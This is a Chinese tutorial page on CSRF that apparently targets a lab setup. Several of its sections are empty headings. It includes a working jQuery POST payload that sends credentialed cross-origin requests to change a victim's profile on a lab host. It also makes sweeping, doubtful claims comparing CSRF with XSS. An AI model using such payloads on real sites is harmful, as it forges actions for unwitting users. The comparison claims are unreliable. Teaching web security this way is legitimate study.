其他分享
首页 > 其他分享> > CSRF 跨站请求伪造 漏洞

CSRF 跨站请求伪造 漏洞

作者:互联网

0x00 CSRF 漏洞概述

0x01 CSRF 漏洞原理

关键点

CSRF 攻击两个条件

  1. 登录受信任网站 A,并在本地生成 Cookie

  2. 不登出 A 的情况下,访问危险网站 B。

0x02 CSRF 漏洞危害

0x03 CSRF 漏洞防御

0x04 CSRF 漏洞利用

  1. GET类型
  1. POST类型
<script src="http://code.jquery.com/jquery-latest.js"></script>
<script type="text/javascript">
    $.ajax({
        url: "http://172.16.12.2/csrfpost/csrf_post_edit.php",
        type: "POST",
        crossDomain:true, //设置跨域为true
        xhrFields: {
        withCredentials: true //默认情况下,标准的跨域请求是不会发送cookie的
          },
        data: {
          sex:"girl",
          phonenum:"18622222225",
          add:"usaaa",
          email:"2",
          submit:"submit"
        }
     //dataType: 'json' // tell jQuery not to process the data // tell jQuery not to set contentType
      });
</script>

0x05 CSRF VS XSS

  1. CSRF比XSS漏洞危害更高,相对XSS而言较难防御。

  2. CSRF可以做到的事情,XSS都可以做到。

  3. XSS有局限性,而CSRF没有局限性。

  4. XSS是利用合法用户 获取其信息,而CSRF是伪造成合法用户 发起请求

0x06 同源策略

什么是源

同源的定义

同源策略是什么

标签:XSS,跨站,受害者,请求,用户,CSRF,同源,伪造
来源: https://www.cnblogs.com/wuhongbin/p/15583741.html